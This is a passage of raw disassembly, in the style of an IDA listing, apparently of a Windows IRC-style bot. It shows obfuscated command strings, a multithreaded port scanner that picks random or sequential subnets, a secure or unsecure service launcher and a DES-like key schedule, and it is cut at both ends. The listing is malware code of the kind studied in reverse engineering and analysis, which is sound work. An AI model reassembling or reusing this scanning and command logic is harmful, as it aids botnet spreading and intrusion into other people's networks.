mov ebx, offset a8sxng_tdfrt ; "8sXNG.tDfrt/"
jmp loc_407722
; ---------------------------------------------------------------------------
loc_40A5F7: ; CODE XREF: sub_403B2C+4787�j
; sub_403B2C+4798�j ...
xor eax, eax
cmp [esi+4], eax
jz loc_40AD70
cmp [esi+8], eax
jz loc_40AD70
cmp [esi+0Ch], eax
jz loc_40AD70
push 8
call sub_41C235
push dword ptr [esi+4]
mov [ebp+arg_C], eax
call sub_422B5A
add eax, [ebp+arg_C]
pop ecx
pop ecx
cmp eax, 0C9h
jg loc_40AF54
push dword ptr [esi]
xor eax, eax
mov [ebp+var_8], eax
mov [ebp+var_4], eax
push offset aWn7_tNza2v ; "wN7.t/nZA2V/"
mov [ebp+var_14], eax
mov [ebp+var_C], eax
mov [ebp+var_1C], eax
mov [ebp+var_10], eax
mov [ebp+var_18], eax
mov [ebp+var_20], eax
mov [ebp+var_28], eax
call ebx ; dword_42F070
test eax, eax
jnz short loc_40A671
mov eax, dword_43295C
mov [ebp+var_8], 1
jmp loc_40A757
; ---------------------------------------------------------------------------
loc_40A671: ; CODE XREF: sub_403B2C+6B32�j
push dword ptr [esi]
push offset aGkyv90skypy ; "gkYv90Skypy/"
call ebx ; dword_42F070
test eax, eax
jnz short loc_40A68F
mov eax, dword_432960
mov [ebp+var_4], 1
jmp loc_40A757
; ---------------------------------------------------------------------------
loc_40A68F: ; CODE XREF: sub_403B2C+6B50�j
push dword ptr [esi]
push offset aX2yn5_2imz1 ; "X2yN5/.2ImZ1"
call ebx ; dword_42F070
test eax, eax
jnz short loc_40A6AD
mov eax, dword_432964
mov [ebp+var_14], 1
jmp loc_40A757
; ---------------------------------------------------------------------------
loc_40A6AD: ; CODE XREF: sub_403B2C+6B6E�j
push dword ptr [esi]
push offset aNPbw1sdkiw_ ; "N/pbW1sDKiw."
call ebx ; dword_42F070
test eax, eax
jnz short loc_40A6CB
mov eax, dword_432968
mov [ebp+var_C], 1
jmp loc_40A757
; ---------------------------------------------------------------------------
loc_40A6CB: ; CODE XREF: sub_403B2C+6B8C�j
push dword ptr [esi]
push offset aFdxpb0leh21_ ; "fDxPB0lEh21."
call ebx ; dword_42F070
test eax, eax
jnz short loc_40A6E6
mov eax, dword_43296C
mov [ebp+var_1C], 1
jmp short loc_40A757
; ---------------------------------------------------------------------------
loc_40A6E6: ; CODE XREF: sub_403B2C+6BAA�j
push dword ptr [esi]
push offset aVb1r0N_arr0 ; "vB1r0/N.Arr0"
call ebx ; dword_42F070
test eax, eax
jnz short loc_40A701
mov eax, dword_432970
mov [ebp+var_10], 1
jmp short loc_40A757
; ---------------------------------------------------------------------------
loc_40A701: ; CODE XREF: sub_403B2C+6BC5�j
push dword ptr [esi]
push offset aUts3o_rfmks_ ; "uts3o.RfmkS."
call ebx ; dword_42F070
test eax, eax
jnz short loc_40A71C
mov eax, dword_432974
mov [ebp+var_18], 1
jmp short loc_40A757
; ---------------------------------------------------------------------------
loc_40A71C: ; CODE XREF: sub_403B2C+6BE0�j
push dword ptr [esi]
push offset aBpyvp_fw0vy1 ; "bPYVP.Fw0vY1"
call ebx ; dword_42F070
test eax, eax
jnz short loc_40A737
mov eax, dword_432978
mov [ebp+var_20], 1
jmp short loc_40A757
; ---------------------------------------------------------------------------
loc_40A737: ; CODE XREF: sub_403B2C+6BFB�j
push dword ptr [esi]
push offset aQxqog1goyq80 ; "QXqOg1gOYq80"
call ebx ; dword_42F070
test eax, eax
jnz short loc_40A752
mov eax, dword_43297C
mov [ebp+var_28], 1
jmp short loc_40A757
; ---------------------------------------------------------------------------
loc_40A752: ; CODE XREF: sub_403B2C+6C16�j
mov eax, dword_432958
loc_40A757: ; CODE XREF: sub_403B2C+6B40�j
; sub_403B2C+6B5E�j ...
and [ebp+arg_8], 0
mov [ebp+arg_0], eax
test eax, eax
jle loc_40AF54
mov ebx, offset aRaMr15qabm1 ; "RA/Mr15qAbm1"
loc_40A76B: ; CODE XREF: sub_403B2C+715F�j
push dword ptr [esi+4]
call sub_422B5A
cdq
idiv [ebp+arg_0]
mov [ebp+var_9C], eax
push dword ptr [esi+4]
call sub_422B5A
cdq
idiv [ebp+arg_0]
pop ecx
pop ecx
cmp eax, 28h
jle short loc_40A79A
mov [ebp+var_9C], 28h
loc_40A79A: ; CODE XREF: sub_403B2C+6C62�j
push dword ptr [esi+8]
call sub_422B5A
cmp eax, 1
pop ecx
mov [ebp+var_B0], eax
jnb short loc_40A7B7
xor eax, eax
inc eax
mov [ebp+var_B0], eax
loc_40A7B7: ; CODE XREF: sub_403B2C+6C80�j
push 6
pop ecx
cmp eax, ecx
jbe short loc_40A7C4
mov [ebp+var_B0], ecx
loc_40A7C4: ; CODE XREF: sub_403B2C+6C90�j
push dword ptr [esi+0Ch]
call sub_422B5A
cmp eax, 270Fh
pop ecx
mov [ebp+var_AC], eax
jbe short loc_40A7E4
mov [ebp+var_AC], 270Fh
loc_40A7E4: ; CODE XREF: sub_403B2C+6CAC�j
or [ebp+var_98], 0FFFFFFFFh
and [ebp+arg_C], 0
cmp dword_432088, 0
jz loc_40A8F3
mov [ebp+arg_4], offset dword_432050
loc_40A803: ; CODE XREF: sub_403B2C+6DA6�j
xor eax, eax
cmp [ebp+var_8], eax
jz short loc_40A81A
mov eax, [ebp+arg_8]
imul eax, 1Ah
add eax, offset dword_432658
jmp loc_40A8B5
; ---------------------------------------------------------------------------
loc_40A81A: ; CODE XREF: sub_403B2C+6CDC�j
cmp [ebp+var_4], eax
jz short loc_40A82F
mov eax, [ebp+arg_8]
imul eax, 1Ah
add eax, offset dword_4326C0
jmp loc_40A8B5
; ---------------------------------------------------------------------------
loc_40A82F: ; CODE XREF: sub_403B2C+6CF1�j
cmp [ebp+var_14], eax
jz short loc_40A841
mov eax, [ebp+arg_8]
imul eax, 1Ah
add eax, offset dword_432710
jmp short loc_40A8B5
; ---------------------------------------------------------------------------
loc_40A841: ; CODE XREF: sub_403B2C+6D06�j
cmp [ebp+var_C], eax
jz short loc_40A853
mov eax, [ebp+arg_8]
imul eax, 1Ah
add eax, offset dword_432760
jmp short loc_40A8B5
; ---------------------------------------------------------------------------
loc_40A853: ; CODE XREF: sub_403B2C+6D18�j
cmp [ebp+var_1C], eax
jz short loc_40A865
mov eax, [ebp+arg_8]
imul eax, 1Ah
add eax, offset dword_4327B0
jmp short loc_40A8B5
; ---------------------------------------------------------------------------
loc_40A865: ; CODE XREF: sub_403B2C+6D2A�j
cmp [ebp+var_10], eax
jz short loc_40A877
mov eax, [ebp+arg_8]
imul eax, 1Ah
add eax, offset dword_432800
jmp short loc_40A8B5
; ---------------------------------------------------------------------------
loc_40A877: ; CODE XREF: sub_403B2C+6D3C�j
cmp [ebp+var_18], eax
jz short loc_40A889
mov eax, [ebp+arg_8]
imul eax, 1Ah
add eax, offset dword_432868
jmp short loc_40A8B5
; ---------------------------------------------------------------------------
loc_40A889: ; CODE XREF: sub_403B2C+6D4E�j
cmp [ebp+var_20], eax
jz short loc_40A89B
mov eax, [ebp+arg_8]
imul eax, 1Ah
add eax, offset dword_4328B8
loc_40A899: ; DATA XREF: .text:00438F54�o
; .text:00438F98�o ...
jmp short loc_40A8B5
; ---------------------------------------------------------------------------
loc_40A89B: ; CODE XREF: sub_403B2C+6D60�j
cmp [ebp+var_28], eax
mov eax, [ebp+arg_8]
jz short loc_40A8AD
imul eax, 1Ah
add eax, offset dword_432908
jmp short loc_40A8B5
; ---------------------------------------------------------------------------
loc_40A8AD: ; CODE XREF: sub_403B2C+6D75�j
imul eax, 1Ah
add eax, offset dword_4325F0
loc_40A8B5: ; CODE XREF: sub_403B2C+6CE9�j
; sub_403B2C+6CFE�j ...
push eax
push [ebp+arg_4]
call sub_422760
pop ecx
test eax, eax
pop ecx
jz short loc_40A8DA
add [ebp+arg_4], 48h
inc [ebp+arg_C]
mov eax, [ebp+arg_4]
cmp dword ptr [eax+38h], 0
jnz loc_40A803
jmp short loc_40A8F3
; ---------------------------------------------------------------------------
loc_40A8DA: ; CODE XREF: sub_403B2C+6D96�j
mov eax, [ebp+arg_C]
mov [ebp+var_98], eax
lea ecx, [eax+eax*8]
mov ecx, dword_432088[ecx*8]
mov [ebp+var_B4], ecx
loc_40A8F3: ; CODE XREF: sub_403B2C+6CCA�j
; sub_403B2C+6DAC�j
xor ecx, ecx
cmp [ebp+var_B4], ecx
jnz short loc_40A93D
cmp [ebp+arg_14], ecx
jnz short loc_40A91B
cmp [ebp+arg_18], ecx
jnz short loc_40A925
push ebx
push offset aSInvalidPort_ ; "%s Invalid port."
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
add esp, 10h
loc_40A91B: ; CODE XREF: sub_403B2C+6DD4�j
cmp [ebp+arg_18], 0
jz loc_40AC82
loc_40A925: ; CODE XREF: sub_403B2C+6DD9�j
push ebx
push offset aSPortInvalid_ ; "%s Port invalid."
push dword ptr [edi]
push [ebp+arg_10]
call sub_410491
add esp, 10h
jmp loc_40AC82
; ---------------------------------------------------------------------------
loc_40A93D: ; CODE XREF: sub_403B2C+6DCF�j
mov eax, [esi+10h]
cmp eax, ecx
jz loc_40A9D0
push eax
push offset aX_x_x_x ; "x.x.x.x"
call sub_422760
pop ecx
test eax, eax
pop ecx
jnz short loc_40A9A1
call dword_42F164 ; GetTickCount
push eax
call sub_4220EF
pop ecx
loc_40A966: ; CODE XREF: sub_403B2C+6E4D�j
call sub_4220FC
cdq
mov ecx, 0F0h
idiv ecx
add edx, 4
cmp edx, 7Fh
jz short loc_40A966
push edx
push offset aD_x_x_x ; "%d.x.x.x"
lea eax, [ebp+var_144]
push 10h
push eax
call sub_42219B
add esp, 10h
loc_40A992: ; CODE XREF: sub_403B2C+7020�j
; sub_403B2C+7028�j ...
mov [ebp+var_88], 1
jmp loc_40AB85
; ---------------------------------------------------------------------------
loc_40A9A1: ; CODE XREF: sub_403B2C+6E2B�j
push dword ptr [esi+10h]
lea eax, [ebp+var_144]
push 10h
push eax
call sub_42219B
push 78h
push dword ptr [esi+10h]
call sub_4233B0
add esp, 14h
neg eax
sbb eax, eax
neg eax
loc_40A9C5: ; CODE XREF: sub_403B2C+6F9E�j
mov [ebp+var_88], eax
jmp loc_40AB85
; ---------------------------------------------------------------------------
loc_40A9D0: ; CODE XREF: sub_403B2C+6E16�j
cmp [ebp+arg_60], ecx
jnz short loc_40AA21
cmp [ebp+arg_50], ecx
jnz short loc_40A9ED
cmp [ebp+arg_54], ecx
jnz short loc_40A9ED
cmp [ebp+arg_58], ecx
jnz short loc_40A9ED
cmp [ebp+arg_5C], ecx
jz loc_40AD53
loc_40A9ED: ; CODE XREF: sub_403B2C+6EAC�j
; sub_403B2C+6EB1�j ...
mov ecx, [ebp+arg_10]
lea eax, [ebp+var_54]
push eax
lea eax, [ebp+var_4C]
push eax
mov [ebp+var_54], 10h
call sub_41112B
push eax
call dword_4542A8 ; getsockname
cmp [ebp+arg_50], 0
jz loc_40AACF
and [ebp+var_48], 0FFh
jmp loc_40AAE6
; ---------------------------------------------------------------------------
loc_40AA21: ; CODE XREF: sub_403B2C+6EA7�j
cmp [ebp+arg_50], ecx
jz short loc_40AA2F
mov [ebp+arg_C], 1
jmp short loc_40AA4D
; ---------------------------------------------------------------------------
loc_40AA2F: ; CODE XREF: sub_403B2C+6EF8�j
cmp [ebp+arg_54], ecx
jz short loc_40AA3D
mov [ebp+arg_C], 2
jmp short loc_40AA4D
; ---------------------------------------------------------------------------
loc_40AA3D: ; CODE XREF: sub_403B2C+6F06�j
cmp [ebp+arg_58], ecx
jz loc_40AD5A
mov [ebp+arg_C], 3
loc_40AA4D: ; CODE XREF: sub_403B2C+6F01�j
; sub_403B2C+6F0F�j
push offset byte_44D6A4
push offset dword_4552D0
call sub_422760
pop ecx
test eax, eax
pop ecx
jz short loc_40AA71
push offset dword_4552D0
call sub_414173
test eax, eax
pop ecx
jz short loc_40AA9A
loc_40AA71: ; CODE XREF: sub_403B2C+6F34�j
mov ecx, [ebp+arg_10]
call sub_41111B
mov ecx, [ebp+arg_10]
push eax
call sub_4105B8
push 2710h
push eax
mov [ebp+arg_4], eax
call dword_42F064 ; WaitForSingleObject
push [ebp+arg_4]
call dword_42F038 ; CloseHandle
loc_40AA9A: ; CODE XREF: sub_403B2C+6F43�j
push [ebp+arg_C]
push [ebp+arg_5C]
push offset dword_4552D0
call sub_401311
add esp, 0Ch
test eax, eax
jz loc_40AF54
push 10h
push eax
lea eax, [ebp+var_144]
push eax
call sub_4222F0
mov eax, [ebp+arg_5C]
add esp, 0Ch
jmp loc_40A9C5
; ---------------------------------------------------------------------------
loc_40AACF: ; CODE XREF: sub_403B2C+6EE3�j
cmp [ebp+arg_54], 0
jz short loc_40AADC
and word ptr [ebp+var_48+2], 0
jmp short loc_40AAE6
; ---------------------------------------------------------------------------
loc_40AADC: ; CODE XREF: sub_403B2C+6FA7�j
cmp [ebp+arg_58], 0
jz short loc_40AAE6
and byte ptr [ebp+var_48+3], 0
loc_40AAE6: ; CODE XREF: sub_403B2C+6EF0�j
; sub_403B2C+6FAE�j ...
push 10h
push [ebp+var_48]
call dword_45439C ; inet_ntoa
push eax
lea eax, [ebp+var_144]
push eax
call sub_4222F0
add esp, 0Ch
cmp [ebp+arg_5C], 0
jz short loc_40AB7E
xor eax, eax
cmp [ebp+arg_50], eax
mov [ebp+arg_4], eax
jz short loc_40AB1A
mov [ebp+arg_4], 3
jmp short loc_40AB34
; ---------------------------------------------------------------------------
loc_40AB1A: ; CODE XREF: sub_403B2C+6FE3�j
cmp [ebp+arg_54], eax
jz short loc_40AB28
mov [ebp+arg_4], 2
jmp short loc_40AB34
; ---------------------------------------------------------------------------
loc_40AB28: ; CODE XREF: sub_403B2C+6FF1�j
cmp [ebp+arg_58], eax
jz short loc_40AB34
mov [ebp+arg_4], 1
loc_40AB34: ; CODE XREF: sub_403B2C+6FEC�j
; sub_403B2C+6FFA�j ...
lea eax, [ebp+var_144]
push 30h
push eax
call sub_4234F0
and byte ptr [ebp+arg_C+3], 0
cmp [ebp+arg_4], 0
pop ecx
pop ecx
jle loc_40A992
loc_40AB52: ; CODE XREF: sub_403B2C+704B�j
test eax, eax
jz loc_40A992
mov byte ptr [eax], 78h
lea eax, [ebp+var_144]
push 30h
push eax
call sub_4234F0
inc byte ptr [ebp+arg_C+3]
pop ecx
pop ecx
movsx ecx, byte ptr [ebp+arg_C+3]
cmp ecx, [ebp+arg_4]
jl short loc_40AB52
jmp loc_40A992
; ---------------------------------------------------------------------------
loc_40AB7E: ; CODE XREF: sub_403B2C+6FD9�j
and [ebp+var_88], 0
loc_40AB85: ; CODE XREF: sub_403B2C+6E70�j
; sub_403B2C+6E9F�j
mov eax, [ebp+arg_14]
mov ecx, [ebp+arg_10]
mov [ebp+var_94], eax
mov eax, [ebp+arg_20]
mov [ebp+var_8C], eax
mov eax, [ebp+arg_18]
mov [ebp+var_90], eax
mov [ebp+var_7C], ecx
test eax, eax
lea eax, [ebp+var_134]
jz short loc_40ABB7
push offset dword_439638
jmp short loc_40ABBC
; ---------------------------------------------------------------------------
loc_40ABB7: ; CODE XREF: sub_403B2C+7082�j
push offset dword_439644
loc_40ABBC: ; CODE XREF: sub_403B2C+7089�j
push eax
call dword_42F04C ; lstrcpyA
cmp [ebp+var_88], 0
mov eax, offset aRandom ; "Random"
jnz short loc_40ABD6
mov eax, offset aSequential ; "Sequential"
loc_40ABD6: ; CODE XREF: sub_403B2C+70A3�j
push [ebp+var_9C]
lea ecx, [ebp+var_144]
push [ebp+var_AC]
push [ebp+var_B0]
push [ebp+var_B4]
push ecx
push eax
push ebx
push offset aSSPortscanSt_0 ; "%s %s PortScan started on %s:%d with a "...
push 8
call sub_41BED7
add esp, 24h
mov [ebp+var_A8], eax
lea eax, [ebp+arg_6C]
lea ecx, [ebp+var_144]
push eax
xor eax, eax
push eax
push ecx
push offset sub_40178D
push eax
push eax
call dword_42F158 ; CreateThread
mov ecx, [ebp+var_A8]
imul ecx, 1018h
test eax, eax
mov dword_46D414[ecx], eax
jnz short loc_40AC9E
cmp [ebp+arg_14], eax
jnz short loc_40AC62
cmp [ebp+arg_18], eax
jnz short loc_40AC68
call dword_42F068 ; RtlGetLastWin32Error
push eax
push ebx
push offset aSFailedToSta_0 ; "%s Failed to start scan thread, error: "...
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
add esp, 14h
loc_40AC62: ; CODE XREF: sub_403B2C+7114�j
cmp [ebp+arg_18], 0
jz short loc_40AC82
loc_40AC68: ; CODE XREF: sub_403B2C+7119�j
call dword_42F068 ; RtlGetLastWin32Error
push eax
push ebx
push offset aSFailedToSta_0 ; "%s Failed to start scan thread, error: "...
push dword ptr [edi]
push [ebp+arg_10]
call sub_410491
add esp, 14h
loc_40AC82: ; CODE XREF: sub_403B2C+6DF3�j
; sub_403B2C+6E0C�j ...
inc [ebp+arg_8]
mov eax, [ebp+arg_8]
cmp eax, [ebp+arg_0]
jl loc_40A76B
jmp loc_40AF54
; ---------------------------------------------------------------------------
loc_40AC96: ; CODE XREF: sub_403B2C+7179�j
push 32h
call dword_42F15C ; Sleep
loc_40AC9E: ; CODE XREF: sub_403B2C+710F�j
cmp [ebp+var_84], 0
jz short loc_40AC96
xor eax, eax
cmp [ebp+arg_14], eax
jnz short loc_40ACFE
cmp [ebp+arg_18], eax
jnz short loc_40AD08
cmp [ebp+arg_1C], eax
jnz short loc_40AC82
cmp [ebp+var_88], eax
mov eax, offset aRandom ; "Random"
jnz short loc_40ACCA
mov eax, offset aSequential ; "Sequential"
loc_40ACCA: ; CODE XREF: sub_403B2C+7197�j
push [ebp+var_9C]
lea ecx, [ebp+var_144]
push [ebp+var_AC]
push [ebp+var_B0]
push [ebp+var_B4]
push ecx
push eax
push ebx
push offset aSSPortscanSt_0 ; "%s %s PortScan started on %s:%d with a "...
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
add esp, 28h
loc_40ACFE: ; CODE XREF: sub_403B2C+7180�j
cmp [ebp+arg_18], 0
jz loc_40AC82
loc_40AD08: ; CODE XREF: sub_403B2C+7185�j
cmp [ebp+var_88], 0
mov eax, offset aRandom ; "Random"
jnz short loc_40AD1B
mov eax, offset aSequential ; "Sequential"
loc_40AD1B: ; CODE XREF: sub_403B2C+71E8�j
push [ebp+var_9C]
lea ecx, [ebp+var_144]
push [ebp+var_AC]
push [ebp+var_B0]
push [ebp+var_B4]
push ecx
push eax
push ebx
push offset aSSPortscanSt_0 ; "%s %s PortScan started on %s:%d with a "...
push dword ptr [edi]
push [ebp+arg_10]
call sub_410491
add esp, 28h
jmp loc_40AC82
; ---------------------------------------------------------------------------
loc_40AD53: ; CODE XREF: sub_403B2C+6EBB�j
mov esi, offset aSNoIpSpecifi_0 ; "%s No IP specified"
jmp short loc_40AD5F
; ---------------------------------------------------------------------------
loc_40AD5A: ; CODE XREF: sub_403B2C+6F14�j
mov esi, offset aSNoSubnetCla_0 ; "%s No subnet class specified"
loc_40AD5F: ; CODE XREF: sub_403B2C+15ED�j
; sub_403B2C+3F75�j ...
cmp [ebp+arg_14], ecx
jnz loc_407742
cmp [ebp+arg_18], ecx
jmp loc_40772C
; ---------------------------------------------------------------------------
loc_40AD70: ; CODE XREF: sub_403B2C+425E�j
; sub_403B2C+4267�j ...
mov ebx, offset aRaMr15qabm1 ; "RA/Mr15qAbm1"
loc_40AD75: ; CODE XREF: sub_403B2C+179C�j
mov esi, offset aSMissingParamS ; "%s Missing param(s)"
loc_40AD7A: ; CODE XREF: sub_403B2C+4375�j
; sub_403B2C+4440�j ...
cmp [ebp+arg_14], eax
jnz short loc_40AD96
cmp [ebp+arg_18], eax
jnz short loc_40AD9F
push ebx
push esi
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
add esp, 10h
xor eax, eax
loc_40AD96: ; CODE XREF: sub_403B2C+7251�j
cmp [ebp+arg_18], eax
loc_40AD99: ; CODE XREF: sub_403B2C+3C1A�j
; sub_403B2C+4FC4�j
jz loc_40AF54
loc_40AD9F: ; CODE XREF: sub_403B2C+282�j
; sub_403B2C:loc_40772C�j ...
push ebx
loc_40ADA0: ; CODE XREF: sub_403B2C+147E�j
; sub_403B2C+203E�j ...
push esi
loc_40ADA1: ; CODE XREF: sub_403B2C+3B5C�j
; sub_403B2C+3CA0�j ...
push dword ptr [edi]
push [ebp+arg_10]
call sub_410491
loc_40ADAB: ; CODE XREF: sub_403B2C+113�j
; sub_403B2C+3E2�j ...
add esp, 10h
jmp loc_40AF54
; ---------------------------------------------------------------------------
loc_40ADB3: ; CODE XREF: sub_403B2C+148E�j
; sub_403B2C+149F�j
push dword ptr [esi]
push offset aQbwgd0cfxf_ ; "qbwGd0CFxf./"
call ebx ; dword_42F070
mov ebx, eax
push 2
neg ebx
sbb ebx, ebx
inc ebx
call sub_41C254
test eax, eax
pop ecx
mov [ebp+arg_C], eax
jle short loc_40AE16
cmp [ebp+arg_14], 0
mov esi, offset aSSAlreadyRunni ; "%s %s Already running at thread number:"...
mov ebx, offset off_434A64
jnz short loc_40ADFE
cmp [ebp+arg_18], 0
jnz short loc_40AE08
push eax
push ebx
push offset aG4xsw0ja5mx_ ; "g4XSw0jA5mx."
push esi
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
add esp, 18h
loc_40ADFE: ; CODE XREF: sub_403B2C+72B4�j
cmp [ebp+arg_18], 0
jz loc_40AF54
loc_40AE08: ; CODE XREF: sub_403B2C+72BA�j
push [ebp+arg_C]
push ebx
push offset aG4xsw0ja5mx_ ; "g4XSw0jA5mx."
jmp loc_40AF46
; ---------------------------------------------------------------------------
loc_40AE16: ; CODE XREF: sub_403B2C+72A4�j
mov eax, [ebp+arg_14]
mov [ebp+var_3964], eax
mov eax, [ebp+arg_20]
mov [ebp+var_3968], eax
push dword ptr [edi+0Ch]
lea eax, [ebp+var_3A14]
push eax
call dword_42F04C ; lstrcpyA
mov eax, [ebp+arg_10]
xor esi, esi
cmp ebx, esi
mov [ebp+var_3A18], eax
mov [ebp+var_3984], ebx
mov [ebp+var_3980], esi
mov ecx, offset aSecure ; "Secure"
jnz short loc_40AEAA
mov ecx, offset aUnsecure ; "Unsecure"
mov eax, offset aWxbrg_rpy8y_ty ; "wXBrG.Rpy8y.TY84s/myQpz0"
loc_40AE62: ; CODE XREF: sub_403B2C+7383�j
push ecx
push eax
push offset aSS_ ; "%s %s."
push 2
call sub_41BED7
add esp, 10h
mov [ebp+var_3994], eax
lea eax, [ebp+arg_6C]
push eax
lea eax, [ebp+var_3A18]
push esi
push eax
push offset sub_41B226
push esi
push esi
call dword_42F158 ; CreateThread
mov ecx, [ebp+var_3994]
imul ecx, 1018h
cmp eax, esi
mov dword_46D414[ecx], eax
jz short loc_40AEC6
jmp short loc_40AEB9
; ---------------------------------------------------------------------------
loc_40AEAA: ; CODE XREF: sub_403B2C+732A�j
mov eax, offset aG4xsw0ja5mx_ ; "g4XSw0jA5mx."
jmp short loc_40AE62
; ---------------------------------------------------------------------------
loc_40AEB1: ; CODE XREF: sub_403B2C+7393�j
push 32h
call dword_42F15C ; Sleep
loc_40AEB9: ; CODE XREF: sub_403B2C+737C�j
cmp [ebp+var_395C], esi
jz short loc_40AEB1
jmp loc_40AF54
; ---------------------------------------------------------------------------
loc_40AEC6: ; CODE XREF: sub_403B2C+737A�j
cmp [ebp+arg_14], 0
mov esi, offset aSFailedToStart ; "%s Failed to start [%s], error: [%d]"
jnz short loc_40AF0C
cmp [ebp+arg_18], 0
jnz short loc_40AF12
test ebx, ebx
mov [ebp+arg_C], offset aSecure ; "Secure"
jnz short loc_40AF26
mov [ebp+arg_C], offset aUnsecure ; "Unsecure"
mov [ebp+arg_4], offset aWxbrg_rpy8y_ty ; "wXBrG.Rpy8y.TY84s/myQpz0"
loc_40AEF0: ; CODE XREF: sub_403B2C+7401�j
call dword_42F068 ; RtlGetLastWin32Error
push eax
push [ebp+arg_C]
push [ebp+arg_4]
push esi
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
add esp, 18h
loc_40AF0C: ; CODE XREF: sub_403B2C+73A3�j
cmp [ebp+arg_18], 0
jz short loc_40AF54
loc_40AF12: ; CODE XREF: sub_403B2C+73A9�j
test ebx, ebx
mov [ebp+arg_C], offset aSecure ; "Secure"
jnz short loc_40AF2F
mov [ebp+arg_C], offset aUnsecure ; "Unsecure"
jmp short loc_40AF36
; ---------------------------------------------------------------------------
loc_40AF26: ; CODE XREF: sub_403B2C+73B4�j
mov [ebp+arg_4], offset aG4xsw0ja5mx_ ; "g4XSw0jA5mx."
jmp short loc_40AEF0
; ---------------------------------------------------------------------------
loc_40AF2F: ; CODE XREF: sub_403B2C+73EF�j
mov ebx, offset aG4xsw0ja5mx_ ; "g4XSw0jA5mx."
jmp short loc_40AF3B
; ---------------------------------------------------------------------------
loc_40AF36: ; CODE XREF: sub_403B2C+73F8�j
mov ebx, offset aWxbrg_rpy8y_ty ; "wXBrG.Rpy8y.TY84s/myQpz0"
loc_40AF3B: ; CODE XREF: sub_403B2C+7408�j
call dword_42F068 ; RtlGetLastWin32Error
push eax
push [ebp+arg_C]
loc_40AF45: ; CODE XREF: sub_403B2C+BD6�j
; sub_403B2C+C60�j ...
push ebx
loc_40AF46: ; CODE XREF: sub_403B2C+72E5�j
push esi
loc_40AF47: ; CODE XREF: sub_403B2C+1385�j
; sub_403B2C+1AF7�j
push dword ptr [edi]
push [ebp+arg_10]
loc_40AF4C: ; CODE XREF: sub_403B2C+4A67�j
call sub_410491
loc_40AF51: ; CODE XREF: sub_403B2C+4A5F�j
add esp, 18h
loc_40AF54: ; CODE XREF: sub_403B2C+2B�j
; sub_403B2C+3C�j ...
xor eax, eax
inc eax
loc_40AF57: ; CODE XREF: sub_403B2C+CDE�j
; sub_403B2C+1690�j
pop edi
pop esi
pop ebx
leave
retn
sub_403B2C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AF5C proc near ; CODE XREF: sub_420688+3A�p
var_F4 = byte ptr -0F4h
var_F0 = byte ptr -0F0h
var_90 = byte ptr -90h
var_74 = byte ptr -74h
var_3C = byte ptr -3Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0F4h
push ebx
push esi
xor ebx, ebx
push edi
xor ecx, ecx
loc_40AF6C: ; CODE XREF: sub_40AF5C+37�j
movzx eax, byte_435CC8[ecx]
mov esi, [ebp+arg_0]
mov edx, eax
sar edx, 3
and eax, 7
mov dl, [edx+esi]
test byte_435C58[eax*2], dl
setnz al
mov [ebp+ecx+var_74], al
inc ecx
cmp ecx, 38h
jl short loc_40AF6C
mov [ebp+arg_0], ebx
mov [ebp+var_4], 1Eh
loc_40AF9F: ; CODE XREF: sub_40AF5C+F2�j
cmp [ebp+arg_4], 1
jnz short loc_40AFAA
mov eax, [ebp+var_4]
jmp short loc_40AFAF
; ---------------------------------------------------------------------------
loc_40AFAA: ; CODE XREF: sub_40AF5C+47�j
mov eax, [ebp+arg_0]
add eax, eax
loc_40AFAF: ; CODE XREF: sub_40AF5C+4C�j
lea ecx, [ebp+eax*4+var_F0]
lea esi, [ebp+eax*4+var_F4]
mov eax, [ebp+arg_0]
xor edx, edx
mov [ecx], ebx
mov [esi], ebx
movzx eax, byte ptr dword_435D00[eax]
mov edi, eax
loc_40AFCF: ; CODE XREF: sub_40AF5C+8E�j
cmp edi, 1Ch
jge short loc_40AFDA
mov bl, [ebp+edi+var_74]
jmp short loc_40AFE1
; ---------------------------------------------------------------------------
loc_40AFDA: ; CODE XREF: sub_40AF5C+76�j
mov bl, [ebp+edi+var_90]
loc_40AFE1: ; CODE XREF: sub_40AF5C+7C�j
mov [ebp+edx+var_3C], bl
inc edx
inc edi
cmp edx, 1Ch
jl short loc_40AFCF
push 1Ch
pop edi
add eax, edi
loc_40AFF1: ; CODE XREF: sub_40AF5C+B0�j
cmp eax, 38h
jge short loc_40AFFC
mov dl, [ebp+eax+var_74]
jmp short loc_40B003
; ---------------------------------------------------------------------------
loc_40AFFC: ; CODE XREF: sub_40AF5C+98�j
mov dl, [ebp+eax+var_90]
loc_40B003: ; CODE XREF: sub_40AF5C+9E�j
mov [ebp+edi+var_3C], dl
inc edi
inc eax
cmp edi, 38h
jl short loc_40AFF1
xor ebx, ebx
xor eax, eax
loc_40B012: ; CODE XREF: sub_40AF5C+E5�j
lea edx, dword_435D28[eax]
movzx edi, byte ptr [edx-18h]
cmp [ebp+edi+var_3C], bl
jz short loc_40B02B
mov edi, dword_435C68[eax*4]
or [esi], edi
loc_40B02B: ; CODE XREF: sub_40AF5C+C4�j
movzx edx, byte ptr [edx]
cmp [ebp+edx+var_3C], bl
jz short loc_40B03D
mov edx, dword_435C68[eax*4]
or [ecx], edx
loc_40B03D: ; CODE XREF: sub_40AF5C+D6�j
inc eax
cmp eax, 18h
jl short loc_40B012
sub [ebp+var_4], 2
inc [ebp+arg_0]
cmp [ebp+var_4], 0FFFFFFFEh
jg loc_40AF9F
lea eax, [ebp+var_F4]
push eax
call sub_40B066
pop ecx
pop edi
pop esi
pop ebx
leave
retn
sub_40AF5C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B066 proc near ; CODE XREF: sub_40AF5C+FF�p
var_84 = byte ptr -84h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 84h
push ebx
push esi
push edi
lea edx, [ebp+var_84]
mov [ebp+var_4], 10h
loc_40B07F: ; CODE XREF: sub_40B066+8D�j
mov eax, [ebp+arg_0]
add [ebp+arg_0], 4
mov ecx, [ebp+arg_0]
add [ebp+arg_0], 4
